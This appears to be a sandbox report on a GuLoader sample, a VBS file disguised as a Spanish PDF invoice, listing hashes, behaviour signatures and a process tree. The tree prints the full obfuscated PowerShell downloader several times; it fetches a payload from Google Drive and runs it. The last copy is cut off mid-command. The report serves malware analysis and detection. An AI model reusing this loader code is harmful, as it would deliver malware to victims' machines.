guloader | 792cd4f9febcffde3a8f0e4ae8e012f7f2d78ef5c42f7c801e651e0a6680ee37

General

Target

Factura Digi_49875444·pdf.vbs
Size

33KB
MD5

23a871278b8175dff3c51ea64e258d87
SHA1

099366ae409ea0908fbb3facf931028289e48e78
SHA256

a860af9a977d8fc6ad99942d066df0d8ca618c449eb3a3190fc3d49d6755ef17
SHA512

ce7ebf6cb316057556ebaf77de487985ee566fae67a788db6351b091c43a0af5cdab34bde1c8e242ce81c971b39f83c8bcb98d8fe02a12f36e1b14ddfa80e8e9
SSDEEP

384:3k7jqtTDo8r1VebE3KUOOpJWUvZil1pFz:U7mTU8ribNoQUvA1ph

Score

10^/10

guloader discovery downloader

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader

Blocklisted process makes network request 3 IoCs

flow	pid	Process
2	2340	WScript.exe
7	2108	powershell.exe
9	2108	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
6	drive.google.com
7	drive.google.com
11	drive.google.com

Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs

pid	Process
1384	wabmig.exe
1384	wabmig.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2608	powershell.exe
1384	wabmig.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2608 set thread context of 1384	2608	powershell.exe	38

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wabmig.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
2608	powershell.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2108	powershell.exe
2608	powershell.exe
2608	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
2608	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2108	powershell.exe
Token: SeDebugPrivilege	2608	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1384	wabmig.exe

Suspicious use of WriteProcessMemory 23 IoCs

description	pid	Process	procid_target
PID 2340 wrote to memory of 2108	2340	WScript.exe	31
PID 2340 wrote to memory of 2108	2340	WScript.exe	31
PID 2340 wrote to memory of 2108	2340	WScript.exe	31
PID 2108 wrote to memory of 2912	2108	powershell.exe	33
PID 2108 wrote to memory of 2912	2108	powershell.exe	33
PID 2108 wrote to memory of 2912	2108	powershell.exe	33
PID 2108 wrote to memory of 2588	2108	powershell.exe	35
PID 2108 wrote to memory of 2588	2108	powershell.exe	35
PID 2108 wrote to memory of 2588	2108	powershell.exe	35
PID 2588 wrote to memory of 2608	2588	cmd.exe	36
PID 2588 wrote to memory of 2608	2588	cmd.exe	36
PID 2588 wrote to memory of 2608	2588	cmd.exe	36
PID 2588 wrote to memory of 2608	2588	cmd.exe	36
PID 2608 wrote to memory of 1060	2608	powershell.exe	37
PID 2608 wrote to memory of 1060	2608	powershell.exe	37
PID 2608 wrote to memory of 1060	2608	powershell.exe	37
PID 2608 wrote to memory of 1060	2608	powershell.exe	37
PID 2608 wrote to memory of 1384	2608	powershell.exe	38
PID 2608 wrote to memory of 1384	2608	powershell.exe	38
PID 2608 wrote to memory of 1384	2608	powershell.exe	38
PID 2608 wrote to memory of 1384	2608	powershell.exe	38
PID 2608 wrote to memory of 1384	2608	powershell.exe	38
PID 2608 wrote to memory of 1384	2608	powershell.exe	38

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Factura Digi_49875444·pdf.vbs"
1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2340
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Signiory Glammene caprylene #>;$Pligtforsmmelse='acoemeti';<#Epigraphic freyas dartboard Radiogoniometry gudfaren #>;$Kuku=$host.PrivateData;If ($Kuku) {$Vrdimngders++;}function Traverseringer($Enwinding){$Atlantens=$Enwinding.Length-$Vrdimngders;for( $Nabosegmenterne=5;$Nabosegmenterne -lt $Atlantens;$Nabosegmenterne+=6){$Corneule+=$Enwinding[$Nabosegmenterne];}$Corneule;}function Preapproval184($Cantare){ . ($Terribility) ($Cantare);}$Gambas=Traverseringer ',tdtrM Tu,eoKaffezMatrii T uglA stalAndeba nde/Stjra5R dod.Sli,b0Termi scopu( L.stWBuzzgiAnmelnSpe mdH lvaoStraawUnubis Kran RoueNKa,veTEtp,r Stamp1Revis0Hepat.Arche0Un,er; nop NedstWM,talieucomnFinan6Kolos4Fedtl; rum Ped.mxs,eto6Ejend4Eidou;Moral GlanerUngkovPrste:Micro1Rando2Bagep1 orst.i com0 rni)U.jui FoetoGFr.rgeGyno cGappik BaegoPro.o/M.scu2Pe ic0Opnaa1St.ne0 Mi d0 retr1Bille0 Udsa1Dee k repaF KvaliRegn.rBrod.eToo mfGranaoTilk.xFors /.hron1 ovis2 liv1Masse.poste0Deplo ';$Sarandon=Traverseringer 'Sja,kuPdagosYago E Tra.rAiger-Pans ACospoGdomydeFootwnkarantTirag ';$Helbredelser=Traverseringer 'UmulihExclutKvls,tBrystp Stans Refl:Intra/Naale/Savagd,epharStolaiDefecvA.ysseLarde.Hackmg FlokoKukeroFode gIldral Ke ie Cap .Sprudc cardoArbejmBagsd/Her.aumedarc F lk?afskae RecoxO ittpSub,aogas rrKystbt Eggs= PyntdRes.eoFestiwKorponRs nolEm eoo omopafurtidCloac&Ta eriT.udddTj,es=subsu1Relakw Ve dJ undZNedadu ,rinqTrans3Fni tVSpis.5princLSkolecSanemx Leuc3LivsnGBoghoEShrilI S.elECa raJ RestFLydteSC strRStrika igiHA skuXHolotzLitig_ nvoymVveskLOnaggGPandeL sudaX LandN ovedTHapl, ';$Bnkebideren=Traverseringer 'Marsk>Ti.pi ';$Terribility=Traverseringer 'omka I TrveEBe.egxOxalu ';$Predecessor='Floraerne';$leto = Traverseringer 'Intore justc Asy,hErklroUnder tidsr%Haan aThreppPl stpGe kodEch,naUningtTobogaRotun%Methe\Ele tFFidacaBesinvEgbohn EpheeFullm.L aneFOpfinoCe.rir Shop Ridse&Micro&Raffi S,nseeKu tuc CreahYtrinoUaktu RolletBadan ';Preapproval184 (Traverseringer 'Anven$ SkydgTer slKon eoKalibbInt gaprofulMaski:Is laSSa,onk Noisu Kai,mIlluslNonl.sTrephn Tri.iFerfen Sumpg Blooe ogtin.ysershirdm=Skra (Tractc T apmLgge.dT.mpo Gouti/M ppecEpicl Car e$Rhe.ul ConveEditot Eu.aoKolle) Rote ');Preapproval184 (Traverseringer ' Trkk$ EndogGri,mlVirgioSk,lsbFrkenaEhrlil tele:BabeiBStje.r CyandGuyspfOps idSk.bs=Dr ft$SknkeHElecte Maril .uadbPaatarPrepee MoundHvi leAftralChacosFlsomeOevelr Agis.DiaursTestpp KapilTune iSh,ewtut,ne( Dige$Unre.B.niplnRepark egore ipunbUnderiTo nadHyoide Realr RegneAutovn F,nk)Frisk ');Preapproval184 (Traverseringer 'Agris[Ca noNEm.tieVetert gnos.SkydeSSteateErkl,rGravivK,eosi Syd cFor,seFolkePVrdi,o .rodi Ex rnMyxogtHelleMUdganaPro,rnEl.ktaP acig,ndere FalcrPapma] Fine:Chemo:kittlSB stleSme.tcPaneluSkmtsr JelliUnhootSuperyrentePBrandr Resbodec at SamloUdmarcKnokloFannelexocu messm=Lsni, Tritu[Phoe.N kulpe.iscotGevir.FlambSGirdleX nogcDesuluSob.rrSkr viAs est unpiyHeterP jungrD magoTillbt BriaoIlle ctaxafoPistolHoreuTRolliyImdekpTrutheSk ma] Warp:rej e:reeveT LyselSvinksAabn,1Antil2Udsla ');$Helbredelser=$Brdfd[0];$Molewarp= (Traverseringer ' ires$Fie dGUnp eLUstoroUds eBCoeloaSatanLtatte:CompuF PaeaIMystesAppliHRechaW ,amii llovava aEMa npS upul= DrognCalciENa anwSuper-dvlesO kvalBFurn.j MortE remtc Nonctflyve AccisMa,erYSwathSPl ght rusteDisenM arbi.TaabeNSandheIgangTan ri.Lakr,W BeaaeverstBJereeC vikklPi kwiTiffaEStrmeNEle.tt');$Molewarp+=$Skumlsningens[1];Preapproval184 ($Molewarp);Preapproval184 (Traverseringer 'Tegne$ SuprFAnodoiIndstsHilsahBesaewViaduiArntsv Utake C njsDyng .M altHI,tere BredaoveredLupuleAstylr,ihils bjur[Bened$smeltS So aaNaphtrVidneaPublinDunbid isoroJ,nksnAcedi]Men.e=preun$ PietG SweeaKirkemBrndebPubl.aFrostsSkdes ');$Foragtens=Traverseringer ' ingb$SirikF Mo piManqusPralehInforwSuperi Pri.vUdlsneAgerlsTrien.SeddeDCountoSynsrw SournGrnselR sysoChro aPredadTwofoFTvangiin umlParameDehum( Citi$ UdbrHChafeeWalk l Ap,mb antarPr gre Absod progeSit rl Bands Cuirewitacr men,Paate$SyndiK Fo nvIncu,iYear vEmbosachevalQ,alieBe srnExhibtdeeneeVacatr agte) Krit ';$Kvivalenter=$Skumlsningens[0];Preapproval184 (Traverseringer 'Imdek$ Glasg LnrelSq.aloAn egb RollAYe saL Cade: Re rB pilIL.steMAchelIRegneNfiskeiSou.d=godke(Al.alTAndroEAfspnsPluritPa io-Conspp ,altARskenT TresHArgle Fle $SpadeKMelboVFaksiIOthe.v dsknaVej alDrenge ArbeNDocklTInchaeBrug,r Unfo)Trila ');while (!$Bimini) {Preapproval184 (Traverseringer 'olymp$MarblgZakmilInfraoUbef bVieweaSammelUnani: AllesLseprvSpattrKurseiTra,snBo ncd ka tuBreccs OrdstSherarDatakiPolop=Orkan$ ResptRockerBas,luShau.e Detm ') ;Preapproval184 $Foragtens;Preapproval184 (Traverseringer 'ErgotSBobletDesigaDuplir andst Subc-UvsenS iberlaviseeAllereNeuropDicep High 4Waxil ');Preapproval184 (Traverseringer 'Tildr$A,tergHavkalHermioEs ribba raaBlo tlBlakk: Sva,B HenniAstermTrinoiLavisnEngagi Rubi=Topal(Gri,fTRe neeTwifosNeotrtElsiz- ParaPArkanaCar it kuffhImpas Gran$ O skKVerifvBosc iSammevPluriaMedstl R,tieDamsen BiogtU.vale ArberNe co)Zymes ') ;Preapproval184 (Traverseringer 'Speak$RundhgSundhlStatioIn.utbst.lda An,el Indb:TyphoSInvesa Paasp Skra=Achil$Demo gdu nel Gra,o ska bAn tia feltl Mul.: arsoE Tegln FlowtNy ageHanderI effoCong,lLimbiiAevumtunderhTact.i orbaa .uirsHyperiUnequsOver +Bikag+ Sw,n%Reave$ rejnBMikror kftedOutbufPo ntd trll.UafvicK.gedosilviuAutornKa.iat Redb ') ;$Helbredelser=$Brdfd[$Sap];}$Effluent=328183;$Tilendebringende141=30662;Preapproval184 (Traverseringer 'Kisse$In urgInfi lReroyoS ranbAer sa A.telUnree:AndroUIdentdObtaivBrackitiltakPosi lFel fiImdekn S orgCholesPennaoUrsicmMill.kWhi woNedsksRinaltspanknAblatiTildenIngelgCannoeFattirFj re Coryl= aand AotesGAcroge expltR bbl- rillCforfaoRe imn Sys tBilleeUntarnTthedtforva ,rter$Vict.KHushovChintiSyendvDesubaColoul ExceeZym ln IntetGesxeeCentrr Vold ');Preapproval184 (Traverseringer 'Nonar$UtydegteleflSaltko HellbCons a Actal lbes: uforAAnalymyd.eltRidessCoriogMateraatr crR turaInst n Str.tBes ti Mano Haabe=Brier Krymm[measuSWo anyshifts ud,tt Opsae ,imimUltra.LianeCSaddloUbesknIndenv Aftee RaasrAchrotHamal]Regne:H ael:St,idF ingarOctupoBrnd,mButtoBExaggaCu drsRealie kort6Nonst4ForpaSRetspt.ardirAngreiAktien Hal gPic i( pr e$NotedU,krvldStrokvFiskei dssyk etall,ubliiAflusnprejugGolfes WhipoEmp,rmIm.erkredouoTyskesDismatRecoin DipliByggenHyphog HjlpeHaa drSlagt)Matut ');Preapproval184 (Traverseringer 'Stemm$FuglegReflel ouchop ismbreduxa Mylolvrkst:GraftK DioprUnderaMaranbTyvennForudiNaadlnArdufg,rila Ruina=Roets Newfo[ Fil,SFredyydeputsLindstSnorkeFdselmGraes.cooinT ,onne In exTunnetAmar,.DelegE EparnValuec DysfoUnfaddSuperiAfhudnFastlgOptim]temp.: Delt:Phy,oA,uttuSAllegC recrIOvercI adel.FoderGUnisteShellt trimSDest tFrkenrFatteiScle,nHeroigLuann(Afmar$Un ppAExpedm SkrktH,pnosSignagB nebaBianirE thra Afren UnextTi.loiL apf)icono ');Preapproval184 (Traverseringer 'Be ys$ Kil gIntenl Sub oVartebFarefasynstl Inst:RialtSfangskTail rTendeu omnieju tar Laci=Hoved$TessuKA grurPhoreaBoultbAerognUnderi AnarnShoolgCcid . alors sakruAtombbPristsTr pet SemirBlgedica.ulnForbrgHomer( Line$RoyceESvrdffRobo fDj ell SticuEuo meWositn KructAs.or,Slags$TjernTIonisiReadvl AegaeOvervn ,oetdOuttyeOpre.bTilvkr askihochhn LiqugSdssueintron Sk.ldUnbleehftn 1E.skl4 Ophi1dosim)Flage ');Preapproval184 $Skruer;"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2108
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Favne.For && echo t"
    3⤵
    PID:2912
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#Signiory Glammene caprylene #>;$Pligtforsmmelse='acoemeti';<#Epigraphic freyas dartboard Radiogoniometry gudfaren #>;$Kuku=$host.PrivateData;If ($Kuku) {$Vrdimngders++;}function Traverseringer($Enwinding){$Atlantens=$Enwinding.Length-$Vrdimngders;for( $Nabosegmenterne=5;$Nabosegmenterne -lt $Atlantens;$Nabosegmenterne+=6){$Corneule+=$Enwinding[$Nabosegmenterne];}$Corneule;}function Preapproval184($Cantare){ . ($Terribility) ($Cantare);}$Gambas=Traverseringer ',tdtrM Tu,eoKaffezMatrii T uglA stalAndeba nde/Stjra5R dod.Sli,b0Termi scopu( L.stWBuzzgiAnmelnSpe mdH lvaoStraawUnubis Kran RoueNKa,veTEtp,r Stamp1Revis0Hepat.Arche0Un,er; nop NedstWM,talieucomnFinan6Kolos4Fedtl; rum Ped.mxs,eto6Ejend4Eidou;Moral GlanerUngkovPrste:Micro1Rando2Bagep1 orst.i com0 rni)U.jui FoetoGFr.rgeGyno cGappik BaegoPro.o/M.scu2Pe ic0Opnaa1St.ne0 Mi d0 retr1Bille0 Udsa1Dee k repaF KvaliRegn.rBrod.eToo mfGranaoTilk.xFors /.hron1 ovis2 liv1Masse.poste0Deplo ';$Sarandon=Traverseringer 'Sja,kuPdagosYago E Tra.rAiger-Pans ACospoGdomydeFootwnkarantTirag ';$Helbredelser=Traverseringer 'UmulihExclutKvls,tBrystp Stans Refl:Intra/Naale/Savagd,epharStolaiDefecvA.ysseLarde.Hackmg FlokoKukeroFode gIldral Ke ie Cap .Sprudc cardoArbejmBagsd/Her.aumedarc F lk?afskae RecoxO ittpSub,aogas rrKystbt Eggs= PyntdRes.eoFestiwKorponRs nolEm eoo omopafurtidCloac&Ta eriT.udddTj,es=subsu1Relakw Ve dJ undZNedadu ,rinqTrans3Fni tVSpis.5princLSkolecSanemx Leuc3LivsnGBoghoEShrilI S.elECa raJ RestFLydteSC strRStrika igiHA skuXHolotzLitig_ nvoymVveskLOnaggGPandeL sudaX LandN ovedTHapl, ';$Bnkebideren=Traverseringer 'Marsk>Ti.pi ';$Terribility=Traverseringer 'omka I TrveEBe.egxOxalu ';$Predecessor='Floraerne';$leto = Traverseringer 'Intore justc Asy,hErklroUnder tidsr%Haan aThreppPl stpGe kodEch,naUningtTobogaRotun%Methe\Ele tFFidacaBesinvEgbohn EpheeFullm.L aneFOpfinoCe.rir Shop Ridse&Micro&Raffi S,nseeKu tuc CreahYtrinoUaktu RolletBadan ';Preapproval184 (Traverseringer 'Anven$ SkydgTer slKon eoKalibbInt gaprofulMaski:Is laSSa,onk Noisu Kai,mIlluslNonl.sTrephn Tri.iFerfen Sumpg Blooe ogtin.ysershirdm=Skra (Tractc T apmLgge.dT.mpo Gouti/M ppecEpicl Car e$Rhe.ul ConveEditot Eu.aoKolle) Rote ');Preapproval184 (Traverseringer ' Trkk$ EndogGri,mlVirgioSk,lsbFrkenaEhrlil tele:BabeiBStje.r CyandGuyspfOps idSk.bs=Dr ft$SknkeHElecte Maril .uadbPaatarPrepee MoundHvi leAftralChacosFlsomeOevelr Agis.DiaursTestpp KapilTune iSh,ewtut,ne( Dige$Unre.B.niplnRepark egore ipunbUnderiTo nadHyoide Realr RegneAutovn F,nk)Frisk ');Preapproval184 (Traverseringer 'Agris[Ca noNEm.tieVetert gnos.SkydeSSteateErkl,rGravivK,eosi Syd cFor,seFolkePVrdi,o .rodi Ex rnMyxogtHelleMUdganaPro,rnEl.ktaP acig,ndere FalcrPapma] Fine:Chemo:kittlSB stleSme.tcPaneluSkmtsr JelliUnhootSuperyrentePBrandr Resbodec at SamloUdmarcKnokloFannelexocu messm=Lsni, Tritu[Phoe.N kulpe.iscotGevir.FlambSGirdleX nogcDesuluSob.rrSkr viAs est unpiyHeterP jungrD magoTillbt BriaoIlle ctaxafoPistolHoreuTRolliyImdekpTrutheSk ma] Warp:rej e:reeveT LyselSvinksAabn,1Antil2Udsla ');$Helbredelser=$Brdfd[0];$Molewarp= (Traverseringer ' ires$Fie dGUnp eLUstoroUds eBCoeloaSatanLtatte:CompuF PaeaIMystesAppliHRechaW ,amii llovava aEMa npS upul= DrognCalciENa anwSuper-dvlesO kvalBFurn.j MortE remtc Nonctflyve AccisMa,erYSwathSPl ght rusteDisenM arbi.TaabeNSandheIgangTan ri.Lakr,W BeaaeverstBJereeC vikklPi kwiTiffaEStrmeNEle.tt');$Molewarp+=$Skumlsningens[1];Preapproval184 ($Molewarp);Preapproval184 (Traverseringer 'Tegne$ SuprFAnodoiIndstsHilsahBesaewViaduiArntsv Utake C njsDyng .M altHI,tere BredaoveredLupuleAstylr,ihils bjur[Bened$smeltS So aaNaphtrVidneaPublinDunbid isoroJ,nksnAcedi]Men.e=preun$ PietG SweeaKirkemBrndebPubl.aFrostsSkdes ');$Foragtens=Traverseringer ' ingb$SirikF Mo piManqusPralehInforwSuperi Pri.vUdlsneAgerlsTrien.SeddeDCountoSynsrw SournGrnselR sysoChro aPredadTwofoFTvangiin umlParameDehum( Citi$ UdbrHChafeeWalk l Ap,mb antarPr gre Absod progeSit rl Bands Cuirewitacr men,Paate$SyndiK Fo nvIncu,iYear vEmbosachevalQ,alieBe srnExhibtdeeneeVacatr agte) Krit ';$Kvivalenter=$Skumlsningens[0];Preapproval184 (Traverseringer 'Imdek$ Glasg LnrelSq.aloAn egb RollAYe saL Cade: Re rB pilIL.steMAchelIRegneNfiskeiSou.d=godke(Al.alTAndroEAfspnsPluritPa io-Conspp ,altARskenT TresHArgle Fle $SpadeKMelboVFaksiIOthe.v dsknaVej alDrenge ArbeNDocklTInchaeBrug,r Unfo)Trila ');while (!$Bimini) {Preapproval184 (Traverseringer 'olymp$MarblgZakmilInfraoUbef bVieweaSammelUnani: AllesLseprvSpattrKurseiTra,snBo ncd ka tuBreccs OrdstSherarDatakiPolop=Orkan$ ResptRockerBas,luShau.e Detm ') ;Preapproval184 $Foragtens;Preapproval184 (Traverseringer 'ErgotSBobletDesigaDuplir andst Subc-UvsenS iberlaviseeAllereNeuropDicep High 4Waxil ');Preapproval184 (Traverseringer 'Tildr$A,tergHavkalHermioEs ribba raaBlo tlBlakk: Sva,B HenniAstermTrinoiLavisnEngagi Rubi=Topal(Gri,fTRe neeTwifosNeotrtElsiz- ParaPArkanaCar it kuffhImpas Gran$ O skKVerifvBosc iSammevPluriaMedstl R,tieDamsen BiogtU.vale ArberNe co)Zymes ') ;Preapproval184 (Traverseringer 'Speak$RundhgSundhlStatioIn.utbst.lda An,el Indb:TyphoSInvesa Paasp Skra=Achil$Demo gdu nel Gra,o ska bAn tia feltl Mul.: arsoE Tegln FlowtNy ageHanderI effoCong,lLimbiiAevumtunderhTact.i orbaa .uirsHyperiUnequsOver +Bikag+ Sw,n%Reave$ rejnBMikror kftedOutbufPo ntd trll.UafvicK.gedosilviuAutornKa.iat Redb ') ;$Helbredelser=$Brdfd[$Sap];}$Effluent=328183;$Tilendebringende141=30662;Preapproval184 (Traverseringer 'Kisse$In urgInfi lReroyoS ranbAer sa A.telUnree:AndroUIdentdObtaivBrackitiltakPosi lFel fiImdekn S orgCholesPennaoUrsicmMill.kWhi woNedsksRinaltspanknAblatiTildenIngelgCannoeFattirFj re Coryl= aand AotesGAcroge expltR bbl- rillCforfaoRe imn Sys tBilleeUntarnTthedtforva ,rter$Vict.KHushovChintiSyendvDesubaColoul ExceeZym ln IntetGesxeeCentrr Vold ');Preapproval184 (Traverseringer 'Nonar$UtydegteleflSaltko HellbCons a Actal lbes: uforAAnalymyd.eltRidessCoriogMateraatr crR turaInst n Str.tBes ti Mano Haabe=Brier Krymm[measuSWo anyshifts ud,tt Opsae ,imimUltra.LianeCSaddloUbesknIndenv Aftee RaasrAchrotHamal]Regne:H ael:St,idF ingarOctupoBrnd,mButtoBExaggaCu drsRealie kort6Nonst4ForpaSRetspt.ardirAngreiAktien Hal gPic i( pr e$NotedU,krvldStrokvFiskei dssyk etall,ubliiAflusnprejugGolfes WhipoEmp,rmIm.erkredouoTyskesDismatRecoin DipliByggenHyphog HjlpeHaa drSlagt)Matut ');Preapproval184 (Traverseringer 'Stemm$FuglegReflel ouchop ismbreduxa Mylolvrkst:GraftK DioprUnderaMaranbTyvennForudiNaadlnArdufg,rila Ruina=Roets Newfo[ Fil,SFredyydeputsLindstSnorkeFdselmGraes.cooinT ,onne In exTunnetAmar,.DelegE EparnValuec DysfoUnfaddSuperiAfhudnFastlgOptim]temp.: Delt:Phy,oA,uttuSAllegC recrIOvercI adel.FoderGUnisteShellt trimSDest tFrkenrFatteiScle,nHeroigLuann(Afmar$Un ppAExpedm SkrktH,pnosSignagB nebaBianirE thra Afren UnextTi.loiL apf)icono ');Preapproval184 (Traverseringer 'Be ys$ Kil gIntenl Sub oVartebFarefasynstl Inst:RialtSfangskTail rTendeu omnieju tar Laci=Hoved$TessuKA grurPhoreaBoultbAerognUnderi AnarnShoolgCcid . alors sakruAtombbPristsTr pet SemirBlgedica.ulnForbrgHomer( Line$RoyceESvrdffRobo fDj ell SticuEuo meWositn KructAs.or,Slags$TjernTIonisiReadvl AegaeOvervn ,oetdOuttyeOpre.bTilvkr askihochhn LiqugSdssueintron Sk.ldUnbleehftn 1E.skl4 Ophi1dosim)Flage ');Preapproval184 $Skruer;"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2588
  - - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Signiory Glammene caprylene #>;$Pligtforsmmelse='acoemeti';<#Epigraphic freyas dartboard Radiogoniometry gudfaren #>;$Kuku=$host.PrivateData;If ($Kuku) {$Vrdimngders++;}function Traverseringer($Enwinding){$Atlantens=$Enwinding.Length-$Vrdimngders;for( $Nabosegmenterne=5;$Nabosegmenterne -lt $Atlantens;$Nabosegmenterne+=6){$Corneule+=$Enwinding[$Nabosegmenterne];}$Corneule;}function Preapproval184($Cantare){ . ($Terribility) ($Cantare);}$Gambas=Traverseringer ',tdtrM Tu,eoKaffezMatrii T uglA stalAndeba nde/Stjra5R dod.Sli,b0Termi scopu( L.stWBuzzgiAnmelnSpe mdH lvaoStraawUnubis Kran RoueNKa,veTEtp,r Stamp1Revis0Hepat.Arche0Un,er; nop NedstWM,talieucomnFinan6Kolos4Fedtl; rum Ped.mxs,eto6Ejend4Eidou;Moral GlanerUngkovPrste:Micro1Rando2Bagep1 orst.i com0 rni)U.jui FoetoGFr.rgeGyno cGappik BaegoPro.o/M.scu2Pe ic0Opnaa1St.ne0 Mi d0 retr1Bille0 Udsa1Dee k repaF KvaliRegn.rBrod.eToo mfGranaoTilk.xFors /.hron1 ovis2 liv1Masse.poste0Deplo ';$Sarandon=Traverseringer 'Sja,kuPdagosYago E Tra.rAiger-Pans ACospoGdomydeFootwnkarantTirag ';$Helbredelser=Traverseringer 'UmulihExclutKvls,tBrystp Stans Refl:Intra/Naale/Savagd,epharStolaiDefecvA.ysseLarde.Hackmg FlokoKukeroFode gIldral Ke ie Cap .Sprudc cardoArbejmBagsd/Her.aumedarc F lk?afskae RecoxO ittpSub,aogas rrKystbt Eggs= PyntdRes.eoFestiwKorponRs nolEm eoo omopafurtidCloac&Ta eriT.udddTj,es=subsu1Relakw Ve dJ undZNedadu ,rinqTrans3Fni tVSpis.5princLSkolecSanemx Leuc3LivsnGBoghoEShrilI S.elECa raJ RestFLydteSC strRStrika igiHA skuXHolotzLitig_ nvoymVveskLOnaggGPandeL sudaX LandN ovedTHapl, ';$Bnkebideren=Traverseringer 'Marsk>Ti.pi ';$Terribility=Traverseringer 'omka I TrveEBe.egxOxalu ';$Predecessor='Floraerne';$leto = Traverseringer 'Intore justc Asy,hErklroUnder tidsr%Haan aThreppPl stpGe kodEch,naUningtTobogaRotun%Methe\Ele tFFidacaBesinvEgbohn EpheeFullm.L aneFOpfinoCe.rir Shop Ridse&Micro&Raffi S,nseeKu tuc CreahYtrinoUaktu RolletBadan ';Preapproval184 (Traverseringer 'Anven$ SkydgTer slKon eoKalibbInt gaprofulMaski:Is laSSa,onk Noisu Kai,mIlluslNonl.sTrephn Tri.iFerfen Sumpg Blooe ogtin.ysershirdm=Skra (Tractc T apmLgge.dT.mpo Gouti/M ppecEpicl Car e$Rhe.ul ConveEditot Eu.aoKolle) Rote ');Preapproval184 (Traverseringer ' Trkk$ EndogGri,mlVirgioSk,lsbFrkenaEhrlil tele:BabeiBStje.r CyandGuyspfOps idSk.bs=Dr ft$SknkeHElecte Maril .uadbPaatarPrepee MoundHvi leAftralChacosFlsomeOevelr Agis.DiaursTestpp KapilTune iSh,ewtut,ne( Dige$Unre.B.niplnRepark egore ipunbUnderiTo nadHyoide Realr RegneAutovn F,nk)Frisk ');Preapproval184 (Traverseringer 'Agris[Ca noNEm.tieVetert gnos.SkydeSSteateErkl,rGravivK,eosi Syd cFor,seFolkePVrdi,o .rodi Ex rnMyxogtHelleMUdganaPro,rnEl.ktaP acig,ndere FalcrPapma] Fine:Chemo:kittlSB stleSme.tcPaneluSkmtsr JelliUnhootSuperyrentePBrandr Resbodec at SamloUdmarcKnokloFannelexocu messm=Lsni, Tritu[Phoe.N kulpe.iscotGevir.FlambSGirdleX nogcDesuluSob.rrSkr viAs est unpiyHeterP jungrD magoTillbt BriaoIlle ctaxafoPistolHoreuTRolliyImdekpTrutheSk ma] Warp:rej e:reeveT LyselSvinksAabn,1Antil2Udsla ');$Helbredelser=$Brdfd[0];$Molewarp= (Traverseringer ' ires$Fie dGUnp eLUstoroUds eBCoeloaSatanLtatte:CompuF PaeaIMystesAppliHRechaW ,amii llovava aEMa npS upul= DrognCalciENa anwSuper-dvlesO kvalBFurn.j MortE remtc Nonctflyve AccisMa,erYSwathSPl ght rusteDisenM arbi.TaabeNSandheIgangTan ri.Lakr,W BeaaeverstBJereeC vikklPi kwiTiffaEStrmeNEle.tt');$Molewarp+=$Skumlsningens[1];Preapproval184 ($Molewarp);Preapproval184 (Traverseringer 'Tegne$ SuprFAnodoiIndstsHilsahBesaewViaduiArntsv Utake C njsDyng .M altHI,tere BredaoveredLupuleAstylr,ihils bjur[Bened$smeltS So aaNaphtrVidneaPublinDunbid isoroJ,nksnAcedi]Men.e=preun$ PietG SweeaKirkemBrndebPubl.aFrostsSkdes ');$Foragtens=Traverseringer ' ingb$SirikF Mo piManqusPralehInforwSuperi Pri.vUdlsneAgerlsTrien.SeddeDCountoSynsrw SournGrnselR sysoChro aPredadTwofoFTvangiin umlParameDehum( Citi$ UdbrHChafeeWalk l Ap,mb antarPr gre Absod progeSit rl Bands Cuirewitacr men,Paate$SyndiK Fo nvIncu,iYear vEmbosachevalQ,alieBe srnExhibtdeeneeVacatr agte) Krit ';$Kvivalenter=$Skumlsningens[0];Preapproval184 (Traverseringer 'Imdek$ Glasg LnrelSq.aloAn egb RollAYe saL Cade: Re rB pilIL.steMAchelIRegneNfiskeiSou.d=godke(Al.alTAndroEAfspnsPluritPa io-Conspp ,altARskenT TresHArgle Fle $SpadeKMelboVFaksiIOthe.v dsknaVej alDrenge ArbeNDocklTInchaeBrug,r Unfo)Trila ');while (!$Bimini) {Preapproval184 (Traverseringer 'olymp$MarblgZakmilInfraoUbef bVieweaSammelUnani: AllesLseprvSpattrKurseiTra,snBo ncd ka tuBreccs OrdstSherarDatakiPolop=Orkan$ ResptRockerBas,luShau.e Detm ') ;Preapproval184 $Foragtens;Preapproval184 (Traverseringer 'ErgotSBobletDesigaDuplir andst Subc-UvsenS iberlaviseeAllereNeuropDicep High 4Waxil ');Preapproval184 (Traverseringer 'Tildr$A,tergHavkalHermioEs ribba raaBlo tlBlakk: Sva,B 